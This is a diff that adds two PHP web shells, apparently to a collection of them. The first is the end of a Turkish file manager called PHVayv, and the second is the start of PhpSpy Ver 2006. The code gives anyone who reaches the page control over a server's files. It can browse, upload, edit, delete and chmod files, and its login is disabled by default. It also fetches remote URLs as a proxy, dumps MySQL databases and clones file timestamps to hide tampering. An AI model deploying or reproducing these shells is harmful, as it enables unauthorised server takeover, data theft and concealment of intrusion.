+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-CENTER: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF">XXXX</textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span><br>
+&nbsp;</p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000" align="center" height="19">
+    &nbsp;</td>
+  </tr>
+  </table>
+  
+
+
+<? } else { ?>
+
+
+
+
+
+<?if ($duzenle>"") {; 
+?>
+
+
+
+
+<body topmargin="0" leftmargin="0">
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="1">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="1"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Dosya</span></font></td>
+        <td bgcolor="#D6D6D6" height="1">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4" height="19">
+          <tr>
+            <td width="1" height="19"></td>
+            <td rowspan="2" height="19"><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin/$duzenle"?></font></td>
+          </tr>
+          <tr>
+            <td width="1" height="1"></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+</table>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#9F9F9F">
+    <form method="POST" action="<?echo "PHVayv.php?duzkaydet=$dizin/$duzenle&dizin=$dizin"?>" name="kaypos">
+<p align="center"><b><font face="Verdana, Arial, Helvetica, sans-serif" size="2" color="#000000" bgcolor="Red"> 
+          <br>
+          <textarea name="duzenx" 
+          style="BACKGROUND-COLOR: #eae9e9; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: left"
+        
+          
+          rows="24" cols="122" wrap="OFF"><?$baglan=fopen("$dizin/$duzenle",'r');
+while(! feof ( $baglan ) ){
+$okunan=fgets($baglan,1024);
+echo $okunan;
+} fclose($baglan); ?></textarea></font><font face="Verdana, Arial, Helvetica, sans-serif" size="2"><br>
+<br>
+</font></b>
+	<span class="gensmall">
+		<input type="submit" size="16"
+		name="duzenx1" value="Kaydet"
+		style="BACKGROUND-COLOR: #95B4CC; BORDER-BOTTOM: #000000 1px inset; BORDER-LEFT: #000000 1px inset; BORDER-RIGHT: #000000 1px inset; BORDER-TOP: #000000 1px inset; COLOR: #000000; FONT-FAMILY: Verdana; FONT-SIZE: 8pt; TEXT-ALIGN: center"
+		</span></p>
+</form>
+</td>
+  </tr>
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    &nbsp;</td>
+  </tr>
+  </table>
+
+
+
+
+
+
+
+
+
+
+
+<?
+} else {
+?>
+
+
+
+<html>
+
+<head>
+<meta http-equiv="Content-Language" content="tr">
+<meta name="GENERATOR" content="Microsoft FrontPage 5.0">
+<meta name="ProgId" content="FrontPage.Editor.Document">
+<meta http-equiv="Content-Type" content="text/html; charset=windows-1254">
+<title>PHVayv 1.0</title>
+</head>
+
+<body topmargin="0" leftmargin="0">
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber1" height="59">
+  <tr>
+    <td width="70" bgcolor="#000000" height="76">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/avlog.gif"></td>
+    <td width="501" bgcolor="#000000" height="76" valign="top">
+    <font face="Verdana" style="font-size: 8pt" color="#B7B7B7">
+    <span style="font-weight: 700">
+    <br>
+    AventGrup©<br>
+    </span>Avrasya Veri ve NetWork Teknolojileri Geliştirme Grubu<br>
+    <span style="font-weight: 700">
+    <br>
+    PHVayv 1.0</span></font></td>
+    <td width="431" bgcolor="#000000" height="76" valign="top">
+    <p align="right"><span style="font-weight: 700">
+    <font face="Verdana" color="#858585" style="font-size: 2pt"><br>
+    </font><font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+    <a href="http://www.aventgrup.net" style="text-decoration: none">
+    <font color="#858585">www.aventgrup.net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;<br>
+    </font></span><font face="Verdana" style="font-size: 8pt" color="#858585">
+    <a href="mailto:shopen@aventgrup.net" style="text-decoration: none">
+    <font color="#858585">SHOPEN</font></a></font><font face="Verdana" style="font-size: 8pt" color="#B7B7B7"><a href="mailto:shopen@aventgrup.net" style="text-decoration: none"><font color="#858585">@AventGrup.Net</font></a></font><font face="Verdana" style="font-size: 8pt" color="#858585">&nbsp;</font></td>
+  </tr>
+  </table>
+
+
+
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" id="AutoNumber5" width="100%" height="20">
+      <tr>
+        <td width="110" bgcolor="#9F9F9F" height="20"><font face="Verdana">
+        <span style="font-size: 8pt">&nbsp;Çalışılan Klasör</span></font></td>
+        <td bgcolor="#D6D6D6" height="20">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber4">
+          <tr>
+            <td width="1"></td>
+            <td><font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$dizin"?></font></td>
+            <td width="65">
+            <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber6" height="13">
+              <tr>
+                <td width="100%" bgcolor="#B7B7B7" bordercolor="#9F9F9F" height="13"
+                onmouseover='this.style.background="D9D9D9"'
+                onmouseout='this.style.background="9F9F9F"'
+                style="CURSOR: hand"
+                
+                
+                
+                
+                >
+                <p align="center"><font face="Verdana" style="font-size: 8pt">
+
+
+
+
+
+
+                <a href="<?echo "$fistik.php?dizin=$dizin/../"?>" style="text-decoration: none">
+                <font color="#000000">Üst Klasör</font></a></font></td>
+
+              </tr>
+            </table>
+            </td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+
+
+
+<table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber3" height="21">
+  <tr>
+    <td width="625" bgcolor="#000000"><span style="font-size: 2pt">&nbsp;</span></td>
+  </tr>
+  <tr>
+    <td bgcolor="#000000" height="20">
+    <table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#000000" id="AutoNumber23" bgcolor="#A3A3A3" width="373" height="19">
+      <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber26">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        
+        height="19" bordercolor="#000000">
+        <span style="font-weight: 700">
+        <font face="Verdana" style="font-size: 8pt" color="#9F9F9F">
+        <a color="#9F9F9F" target="_blank" href="<?echo "$fistik.php?sistembilgisi=1";?>" style="text-decoration: none"><font color="#9F9F9F">Sistem Bilgisi</font></a></font></font></span></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber27">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19" 
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+        bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yenklas=1&dizin=$dizin";?>" style="text-decoration: none">
+        <font color="#9F9F9F">Yeni Klasör</font></a></font></td>
+          </tr>
+        </table>
+        </td>
+        <td align="center" bgcolor="#5F5F5F" height="19" bordercolor="#000000">
+        <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber28">
+          <tr>
+        <td align="center" bgcolor="#5F5F5F" height="19"
+        onmouseover="style.background='#6F6F6F'"
+        onmouseout="style.background='#5F5F5F'"
+        style="CURSOR: hand"
+		bordercolor="#000000">
+        <font face="Verdana" style="font-size: 8pt; font-weight: 700" color="#9F9F9F">
+        <a href="<?echo "$fistik.php?yendos=1&dizin=$dizin";?>" style="text-decoration: none"><font color="#9F9F9F">Yeni Dosya</font></a> </font></td>
+          </tr>
+        </table>
+        </td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+  </table>
+
+  
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber7" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Tür</font></td>
+    <td height="17" bgcolor="#9F9F9F">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;Dosya 
+    Adı</font></td>
+    <td width="122" height="17" bgcolor="#9F9F9F">
+    <p align="center">
+    <font face="Verdana" style="font-size: 8pt; font-weight: 700">&nbsp;İşlem</font></td>
+  </tr>
+</table>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_dir("$dizin/$ekinci")){
+?>
+
+<? if ($ekinci=="." or  $ekinci=="..") {
+} else {
+?>
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="17">
+  <tr>
+    <td width="30" height="17" bgcolor="#808080">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/2.gif"></td>
+    <td height="17" bgcolor="#C4C4C4">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font></td>
+    <td width="61" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber15" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?dizin=$dizin/" ?><?echo "$ekinci";?>" style="text-decoration: none">
+        <font color="#000000">Aç</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="17" bgcolor="#C4C4C4" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber18" height="20">
+      <tr>
+        <td width="100%" bgcolor="#A3A3A3"
+        onmouseover="this.style.background='#BBBBBB'"
+        onmouseout="this.style.background='#A3A3A3'"
+
+
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik.php?silklas=$dizin/$ekinci&dizin=$dizin"?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a>
+
+        </font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+<?
+}
+?>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+<?
+if ($sedat=@opendir($dizin)){
+while (($ekinci=readdir ($sedat))){
+if (is_file("$dizin/$ekinci")){
+
+?>
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber8" height="1">
+  <tr>
+    <td width="30" height="1" bgcolor="#B0B0B0">
+    <p align="center">
+    <img border="0" src="http://www.aventgrup.net/arsiv/klasvayv/1.0/1.gif"></td>
+    <td height="1" bgcolor="#EAEAEA">
+    <font face="Verdana" style="font-size: 8pt">&nbsp;<?echo "$ekinci" ?></font>
+    <font face="Arial Narrow" style="font-size: 8pt">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;   ( XXX )&nbsp;</font></td>
+    <td width="61" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber12" height="20">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6"
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a style="text-decoration: none" target="_self" href="<?echo "$fistik";?>.php?duzenle=<?echo "$ekinci";?>&dizin=<?echo $dizin;?>">
+        <font color="#000000">Düzenle</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+    <td width="60" height="1" bgcolor="#D6D6D6" align="center">
+    <table border="0" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber13" height="100%">
+      <tr>
+        <td width="100%" bgcolor="#D6D6D6" no wrap
+        onmouseover="this.style.background='#ACACAC'"
+        onmouseout="this.style.background='#D6D6D6'"
+        style="CURSOR: hand"
+		height="20">
+
+        <p align="center"><font face="Verdana" style="font-size: 8pt">
+        <a href="<?echo "$fistik";?>.php?sildos=<?echo $ekinci;?>&dizin=<?echo $dizin;?>" style="text-decoration: none">
+        <font color="#000000">Sil</font></a></font></td>
+      </tr>
+    </table>
+    </td>
+  </tr>
+</table>
+
+<?
+}}}
+closedir($sedat);
+?>
+
+
+
+
+
+<table border="1" cellpadding="0" cellspacing="0" style="border-collapse: collapse" bordercolor="#111111" width="100%" id="AutoNumber29">
+  <tr>
+    <td width="100%" bgcolor="#000000">&nbsp;</td>
+  </tr>
+</table>
+
+  <tr>
+    <td width="100%" bgcolor="#000000">
+    </body></html><? } ?><? } ?><? } ?><? } ?>
diff --git a/php/PhpSpy Ver 2006.php b/php/PhpSpy Ver 2006.php
new file mode 100644
index 0000000..0378577
--- /dev/null
+++ b/php/PhpSpy Ver 2006.php	
@@ -0,0 +1,1309 @@
+<?php
+/*
++--------------------------------------------------------------------------+
+| str_replace(".", "", "P.h.p.S.p.y") Version:2006                         |
+| Codz by Angel                                                            |
+| (c) 2004 Security Angel Team                                             |
+| http://www.4ngel.net                                                     |
+| ======================================================================== |
+| Team:  http://www.4ngel.net                                              |
+|        http://www.bugkidz.org                                            |
+| Email: 4ngel@21cn.com                                                    |
+| Date:  Mar 21st 2005                                                     |
+| Thx All The Fantasy of Wickedness's members                              |
+| Thx FireFox (http://www.molyx.com)                                       |
++--------------------------------------------------------------------------+
+*/
+
+error_reporting(7);
+ob_start();
+$mtime = explode(' ', microtime());
+$starttime = $mtime[1] + $mtime[0];
+
+/*===================== ³ÌĞòÅäÖà =====================*/
+
+// ÊÇ·ñĞèÒªÃÜÂëÑéÖ¤,1ΪĞèÒªÑéÖ¤,ÆäËûÊı×ÖΪֱ½Ó½øÈë.ÏÂÃæÑ¡ÏîÔòÎŞĞ§
+$admin['check'] = "0";
+
+// Èç¹ûĞèÒªÃÜÂëÑéÖ¤,ÇëĞŞ¸ÄµÇ½ÃÜÂë
+$admin['pass']  = "angel";
+
+/*===================== ÅäÖýáÊø =====================*/
+
+
+// ÔÊĞí³ÌĞòÔÚ register_globals = off µÄ»·¾³Ï¹¤×÷
+$onoff = (function_exists('ini_get')) ? ini_get('register_globals') : get_cfg_var('register_globals');
+
+if ($onoff != 1) {
+	@extract($_POST, EXTR_SKIP);
+	@extract($_GET, EXTR_SKIP);
+}
+
+$self = $_SERVER['PHP_SELF'];
+$dis_func = get_cfg_var("disable_functions");
+
+
+/*===================== Éí·İÑéÖ¤ =====================*/
+if($admin['check'] == "1") {
+	if ($_GET['action'] == "logout") {
+		setcookie ("adminpass", "");
+		echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+		echo "<span style=\"font-size: 12px; font-family: Verdana\">×¢Ïú³É¹¦......<p><a href=\"".$self."\">ÈıÃëºó×Ô¶¯Í˳ö»òµ¥»÷ÕâÀïÍ˳ö³ÌĞò½çÃæ &gt;&gt;&gt;</a></span>";
+		exit;
+	}
+
+	if ($_POST['do'] == 'login') {
+		$thepass=trim($_POST['adminpass']);
+		if ($admin['pass'] == $thepass) {
+			setcookie ("adminpass",$thepass,time()+(1*24*3600));
+			echo "<meta http-equiv=\"refresh\" content=\"3;URL=".$self."\">";
+			echo "<span style=\"font-size: 12px; font-family: Verdana\">µÇ½³É¹¦......<p><a href=\"".$self."\">ÈıÃëºó×Ô¶¯Ìøת»òµ¥»÷ÕâÀï½øÈë³ÌĞò½çÃæ &gt;&gt;&gt;</a></span>";
+			exit;
+		}
+	}
+	if (isset($_COOKIE['adminpass'])) {
+		if ($_COOKIE['adminpass'] != $admin['pass']) {
+			loginpage();
+		}
+	} else {
+		loginpage();
+	}
+}
+/*===================== ÑéÖ¤½áÊø =====================*/
+
+// ÅĞ¶Ï magic_quotes_gpc ״̬
+if (get_magic_quotes_gpc()) {
+    $_GET = stripslashes_array($_GET);
+	$_POST = stripslashes_array($_POST);
+}
+
+// ²é¿´PHPINFO
+if ($_GET['action'] == "phpinfo") {
+	echo $phpinfo=(!eregi("phpinfo",$dis_func)) ? phpinfo() : "phpinfo() º¯ÊıÒѱ»½ûÓÃ,Çë²é¿´&lt;PHP»·¾³±äÁ¿&gt;";
+	exit;
+}
+
+// ÔÚÏß´úÀí
+if (isset($_POST['url'])) {
+	$proxycontents = @file_get_contents($_POST['url']);
+	echo ($proxycontents) ? $proxycontents : "<body bgcolor=\"#F5F5F5\" style=\"font-size: 12px;\"><center><br><p><b>»ñÈ¡ URL ÄÚÈİʧ°Ü</b></p></center></body>";
+	exit;
+}
+
+// ÏÂÔØÎļş
+if (!empty($downfile)) {
+	if (!@file_exists($downfile)) {
+		echo "<script>alert('ÄãҪϵÄÎļş²»´æÔÚ!')</script>";
+	} else {
+		$filename = basename($downfile);
+		$filename_info = explode('.', $filename);
+		$fileext = $filename_info[count($filename_info)-1];
+		header('Content-type: application/x-'.$fileext);
+		header('Content-Disposition: attachment; filename='.$filename);
+		header('Content-Description: PHP Generated Data');
+		header('Content-Length: '.filesize($downfile));
+		@readfile($downfile);
+		exit;
+	}
+}
+
+// Ö±½ÓÏÂÔر¸·İÊı¾İ¿â
+if ($_POST['backuptype'] == 'download') {
+	@mysql_connect($servername,$dbusername,$dbpassword) or die("Êı¾İ¿âÁ¬½Óʧ°Ü");
+	@mysql_select_db($dbname) or die("Ñ¡ÔñÊı¾İ¿âʧ°Ü");	
+	$table = array_flip($_POST['table']);
+	$result = mysql_query("SHOW tables");
+	echo ($result) ? NULL : "³ö´í: ".mysql_error();
+
+	$filename = basename($_SERVER['HTTP_HOST']."_MySQL.sql");
+	header('Content-type: application/unknown');
+	header('Content-Disposition: attachment; filename='.$filename);
+	$mysqldata = '';
+	while ($currow = mysql_fetch_array($result)) {
+		if (isset($table[$currow[0]])) {
+			$mysqldata.= sqldumptable($currow[0]);
+			$mysqldata.= $mysqldata."\r\n";
+		}
+	}
+	mysql_close();
+	exit;
+}
+
+// ³ÌĞòĿ¼
+$pathname=str_replace('\\','/',dirname(__FILE__)); 
+
+// »ñÈ¡µ±Ç°Â·¾¶
+if (!isset($dir) or empty($dir)) {
+	$dir = ".";
+	$nowpath = getPath($pathname, $dir);
+} else {
+	$dir=$_GET['dir'];
+	$nowpath = getPath($pathname, $dir);
+}
+
+// Åж϶ÁĞ´Çé¿ö
+$dir_writeable = (dir_writeable($nowpath)) ? "¿ÉĞ´" : "²»¿ÉĞ´";
+$phpinfo=(!eregi("phpinfo",$dis_func)) ? " | <a href=\"?action=phpinfo\" target=\"_blank\">PHPINFO()</a>" : "";
+$reg = (substr(PHP_OS, 0, 3) == 'WIN') ? " | <a href=\"?action=reg\">×¢²á±í²Ù×÷</a>" : "";
+
+$tb = new FORMS;
+
+?>
+<html>
+<head>
+<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
+<title>PhpSpy Ver 2006</title>
+<style type="text/css">
+body,td {
+	font-family: "Tahoma";
+	font-size: "12px";
+	line-height: "150%";
+}
+.smlfont {
+	font-family: "Tahoma";
+	font-size: "11px";
+}
+.INPUT {
+	FONT-SIZE: "12px";
+	COLOR: "#000000";
+	BACKGROUND-COLOR: "#FFFFFF";
+	height: "18px";
+	border: "1px solid #666666";
+	padding-left: "2px";
+}
+.redfont {
+	COLOR: "#A60000";
+}
+a:link,a:visited,a:active {
+	color: "#000000";
+	text-decoration: underline;
+}
+a:hover {
+	color: "#465584";
+	text-decoration: none;
+}
+.top {BACKGROUND-COLOR: "#CCCCCC"}
+.firstalt {BACKGROUND-COLOR: "#EFEFEF"}
+.secondalt {BACKGROUND-COLOR: "#F5F5F5"}
+</style>
+<SCRIPT language=JavaScript>
+function CheckAll(form) {
+	for (var i=0;i<form.elements.length;i++) {
+		var e = form.elements[i];
+		if (e.name != 'chkall')
+		e.checked = form.chkall.checked;
+    }
+}
+function really(d,f,m,t) {
+	if (confirm(m)) {
+		if (t == 1) {
+			window.location.href='?dir='+d+'&deldir='+f;
+		} else {
+			window.location.href='?dir='+d+'&delfile='+f;
+		}
+	}
+}
+</SCRIPT>
+</head>
+
+<body style="table-layout:fixed; word-break:break-all">
+<center>
+<?php
+$tb->tableheader();
+$tb->tdbody('<table width="98%" border="0" cellpadding="0" cellspacing="0"><tr><td><b>'.$_SERVER['HTTP_HOST'].'</b></td><td align="right"><b>'.$_SERVER['REMOTE_ADDR'].'</b></td></tr></table>','center','top');
+$tb->tdbody('<a href="?action=logout">×¢Ïú»á»°</a> | <a href="?action=dir">·µ»ØPhpSpyĿ¼</a> | <a href="?action=phpenv">PHP»·¾³±äÁ¿</a> | <a href="?action=proxy">ÔÚÏß´úÀí</a>'.$reg.$phpinfo.' | <a href="?action=shell">WebShell</a> | <a href="?action=sql">SQL Query</a> | <a href="?action=sqlbak">MySQL Backup</a>');
+$tb->tablefooter();
+?>
+<hr width="775" noshade>
+<table width="775" border="0" cellpadding="0">
+<?
+$tb->headerform(array('method'=>'GET','content'=>'<p>³ÌĞò·¾¶: '.$pathname.'<br>µ±Ç°Ä¿Â¼('.$dir_writeable.','.substr(base_convert(@fileperms($nowpath),10,8),-4).'): '.$nowpath.'<br>ÌøתĿ¼: '.$tb->makeinput('dir').' '.$tb->makeinput('','È·¶¨','','submit').' ¡¼Ö§³Ö¾ø¶Ô·¾¶ºÍÏà¶Ô·¾¶¡½'));
+
+$tb->headerform(array('action'=>'?dir='.urlencode($dir),'enctype'=>'multipart/form-data','content'=>'ÉÏ´«Îļşµ½µ±Ç°Ä¿Â¼: '.$tb->makeinput('uploadfile','','','file').' '.$tb->makeinput('doupfile','È·¶¨','','submit').$tb->makeinput('uploaddir',$dir,'','hidden')));
+
+$tb->headerform(array('action'=>'?action=editfile&dir='.urlencode($dir),'content'=>'н¨ÎļşÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('editfile').' '.$tb->makeinput('createfile','È·¶¨','','submit')));
+
+$tb->headerform(array('content'=>'н¨Ä¿Â¼ÔÚµ±Ç°Ä¿Â¼: '.$tb->makeinput('newdirectory').' '.$tb->makeinput('createdirectory','È·¶¨','','submit')));
+?>
+</table>
+<hr width="775" noshade>
+<?php
+/*===================== Ö´ĞвÙ×÷ ¿ªÊ¼ =====================*/
+echo "<p><b>\n";
+// ɾ³ıÎļş
+if (!empty($delfile)) {
+	if (file_exists($delfile)) {
+		echo (@unlink($delfile)) ? $delfile." ɾ³ı³É¹¦!" : "ÎļşÉ¾³ıʧ°Ü!";
+	} else {
+		echo basename($delfile)." ÎļşÒѲ»´æÔÚ!";
+	}
+}
+
+// ɾ³ıĿ¼
+elseif (!empty($deldir)) {
+	$deldirs="$dir/$deldir";
+	if (!file_exists("$deldirs")) {
+		echo "$deldir Ŀ¼ÒѲ»´æÔÚ!";
+	} else {
+		echo (deltree($deldirs)) ? "Ŀ¼ɾ³ı³É¹¦!" : "Ŀ¼ɾ³ıʧ°Ü!";
+	}
+}
+
+// ´´½¨Ä¿Â¼
+elseif (($createdirectory) AND !empty($_POST['newdirectory'])) {
+	if (!empty($newdirectory)) {
+		$mkdirs="$dir/$newdirectory";
+		if (file_exists("$mkdirs")) {
+			echo "¸ÃĿ¼ÒÑ´æÔÚ!";
+		} else {
+			echo (@mkdir("$mkdirs",0777)) ? "´´½¨Ä¿Â¼³É¹¦!" : "´´½¨Ê§°Ü!";
+			@chmod("$mkdirs",0777);
+		}
+	}
+}
+
+// ÉÏ´«Îļş
+elseif ($doupfile) {
+	echo (@copy($_FILES['uploadfile']['tmp_name'],"".$uploaddir."/".$_FILES['uploadfile']['name']."")) ? "ÉÏ´«³É¹¦!" : "ÉÏ´«Ê§°Ü!";
+}
+
+// ±à¼­Îļş
+elseif ($_POST['do'] == 'doeditfile') {
+	if (!empty($_POST['editfilename'])) {
+		$filename="$editfilename";
+		@$fp=fopen("$filename","w");
+		echo $msg=@fwrite($fp,$_POST['filecontent']) ? "Ğ´ÈëÎļş³É¹¦!" : "Ğ´Èëʧ°Ü!";
+		@fclose($fp);
+	} else {
+		echo "ÇëÊäÈëÏëÒª±à¼­µÄÎļşÃû!";
+	}
+}
+
+// ±à¼­ÎļşÊôĞÔ
+elseif ($_POST['do'] == 'editfileperm') {
+	if (!empty($_POST['fileperm'])) {
+		$fileperm=base_convert($_POST['fileperm'],8,10);
+		echo (@chmod($dir."/".$file,$fileperm)) ? "ÊôĞÔĞŞ¸Ä³É¹¦!" : "ĞŞ¸Äʧ°Ü!";
+		echo " Îļş ".$file." ĞŞ¸ÄºóµÄÊôĞÔΪ: ".substr(base_convert(@fileperms($dir."/".$file),10,8),-4);
+	} else {
+		echo "ÇëÊäÈëÏëÒªÉèÖõÄÊôĞÔ!";
+	}
+}
+
+// Îļş¸ÄÃû
+elseif ($_POST['do'] == 'rename') {
+	if (!empty($_POST['newname'])) {
+		$newname=$_POST['dir']."/".$_POST['newname'];
+		if (@file_exists($newname)) {
+			echo "".$_POST['newname']." ÒѾ­´æÔÚ,ÇëÖØĞÂÊäÈëÒ»¸ö!";
+		} else {
+			echo (@rename($_POST['oldname'],$newname)) ? basename($_POST['oldname'])." ³É¹¦¸ÄÃûΪ ".$_POST['newname']." !" : "ÎļşÃûĞŞ¸Äʧ°Ü!";
+		}
+	} else {
+		echo "ÇëÊäÈëÏëÒª¸ÄµÄÎļşÃû!";
+	}
+}
+
+// ¿Ë¡ʱ¼ä
+elseif ($_POST['do'] == 'domodtime') {
+	if (!@file_exists($_POST['curfile'])) {
+		echo "ÒªĞŞ¸ÄµÄÎļş²»´æÔÚ!";
+	} else {
+		if (!@file_exists($_POST['tarfile'])) {
+			echo "Òª²ÎÕÕµÄÎļş²»´æÔÚ!";
+		} else {
+			$time=@filemtime($_POST['tarfile']);
+			echo (@touch($_POST['curfile'],$time,$time)) ? basename($_POST['curfile'])." µÄĞŞ¸Äʱ¼ä³É¹¦¸ÄΪ ".date("Y-m-d H:i:s",$time)." !" : "ÎļşµÄĞŞ¸Äʱ¼äĞŞ¸Äʧ°Ü!";
+		}
+	}
+}
+
+// ×Ô¶¨Òåʱ¼ä
+elseif ($_POST['do'] == 'modmytime') {
+	if (!@file_exists($_POST['curfile'])) {
+		echo "ÒªĞŞ¸ÄµÄÎļş²»´æÔÚ!";
+	} else {
